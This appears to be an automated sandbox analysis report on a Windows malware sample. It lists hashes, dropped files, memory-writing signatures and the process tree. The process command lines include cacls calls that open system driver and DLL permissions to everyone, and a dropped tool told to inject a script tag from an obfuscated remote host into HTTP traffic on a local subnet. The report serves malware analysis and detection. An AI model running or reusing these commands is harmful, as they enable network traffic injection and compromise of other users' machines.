Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
09-07-2024 00:29
Static task
static1
Behavioral task
behavioral1
Sample
2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe
Resource
win10v2004-20240708-en
General
-
Target
2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe
-
Size
513KB
-
MD5
2e60c5e2982ae0b32ef5e23e8f332685
-
SHA1
12a5d6ac17f2221d671304f4d6e88b00c40acf8f
-
SHA256
4a44a21023dc9880fceb1bd694c0590d162344016b530267f0808d86e405ef4a
-
SHA512
2ddb3559b2dc878e5904e3904a3ceaf2b8ea8567362169e22164601c0691f8b265304c299a30631dbe8defb440bc908bd12e02492952d57dcd944e8c80357977
-
SSDEEP
6144:7MSbWohE9q2PsXrSVew/X2+wZHeSPVep6s6BCF6GfEWfadRNH0QV:7NW2E9/cZw/X6eSPtfS6G6h
Malware Config
Signatures
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\drivers\npf.sys 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe -
Executes dropped EXE 1 IoCs
pid Process 2968 360saty.exe -
Loads dropped DLL 5 IoCs
pid Process 1976 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe 1976 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe 2968 360saty.exe 2968 360saty.exe 2968 360saty.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File created C:\Windows\SysWOW64\Packet.dll 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe File created C:\Windows\SysWOW64\WanPacket.dll 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe File created C:\Windows\SysWOW64\wpcap.dll 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe File created C:\Windows\SysWOW64\360saty.exe 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 1976 wrote to memory of 2056 1976 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe 31 PID 1976 wrote to memory of 2056 1976 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe 31 PID 1976 wrote to memory of 2056 1976 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe 31 PID 1976 wrote to memory of 2056 1976 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe 31 PID 1976 wrote to memory of 1432 1976 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe 33 PID 1976 wrote to memory of 1432 1976 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe 33 PID 1976 wrote to memory of 1432 1976 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe 33 PID 1976 wrote to memory of 1432 1976 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe 33 PID 1976 wrote to memory of 2288 1976 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe 35 PID 1976 wrote to memory of 2288 1976 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe 35 PID 1976 wrote to memory of 2288 1976 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe 35 PID 1976 wrote to memory of 2288 1976 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe 35 PID 1976 wrote to memory of 2720 1976 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe 37 PID 1976 wrote to memory of 2720 1976 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe 37 PID 1976 wrote to memory of 2720 1976 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe 37 PID 1976 wrote to memory of 2720 1976 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe 37 PID 1976 wrote to memory of 2844 1976 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe 39 PID 1976 wrote to memory of 2844 1976 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe 39 PID 1976 wrote to memory of 2844 1976 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe 39 PID 1976 wrote to memory of 2844 1976 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe 39 PID 1976 wrote to memory of 2968 1976 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe 41 PID 1976 wrote to memory of 2968 1976 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe 41 PID 1976 wrote to memory of 2968 1976 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe 41 PID 1976 wrote to memory of 2968 1976 2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe 41
Processes
-
C:\Users\Admin\AppData\Local\Temp\2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe"1⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" C:\Windows\system32\drivers\npf.sys /e /p everyone:f2⤵PID:2056
-
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" C:\Windows\system32\Packet.dll /e /p everyone:f2⤵PID:1432
-
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" C:\Windows\system32\WanPacket.dll /e /p everyone:f2⤵PID:2288
-
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" C:\Windows\system32\wpcap.dll /e /p everyone:f2⤵PID:2720
-
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" C:\Windows\system32\npptools.dll /e /p everyone:f2⤵PID:2844
-
-
C:\Windows\SysWOW64\360saty.exe"C:\Windows\system32\360saty.exe" -idx 0 -ip 10.127.0.2-10.127.0.254 -port 80 -insert "<script language=javascript src=http://z%6Bm.r%72.%6Eu/tj.js></script>"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2968
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8.0MB
MD5b6a12333e3fc66df707f1db2724457c6
SHA1d7b6877f5cf81121f0a16bfab20c6054e9903b21
SHA2562a200b249a2ab8af6e70e1dca30eda6ce255d5439fa0d9673d9d51f29ae9bb15
SHA512abdb63737dde3e315657a9adf5c86e9cbe84209af863a0d8025d8a1c48706f52e5b72e07cc1e6628e6470146e2e53d1c83e7b2520da469b67c3c23dee32e66e3
-
Filesize
86KB
MD59062aeea8cbfc4f0780bbbefad7cebcb
SHA1c4ad39ec51ad0e84fe58f62931d13cddfde3189e
SHA256b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c
SHA51260957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646
-
Filesize
66KB
MD5fdd104a9fd3427a1df37041fa947a041
SHA1cca1881a3c02033008f78cc39b712b637c7f3e13
SHA256384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a
SHA5129dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7
-
Filesize
234KB
MD5ce842d25e5b7e6ff21a86cad9195fbe8
SHA1d762270be089a89266b012351b52c595e260b59b
SHA2567e8c0119f352424c61d6fad519394924b7aedbf8bfb3557d53c2961747d4c7f3
SHA51284c23addda6ff006d4a3967b472af10a049b2a045d27d988d22153fc3ba517e21520a31eb061a2ef2abf302e365564dd4601d240ec3d5894fb96f10a9fae97d6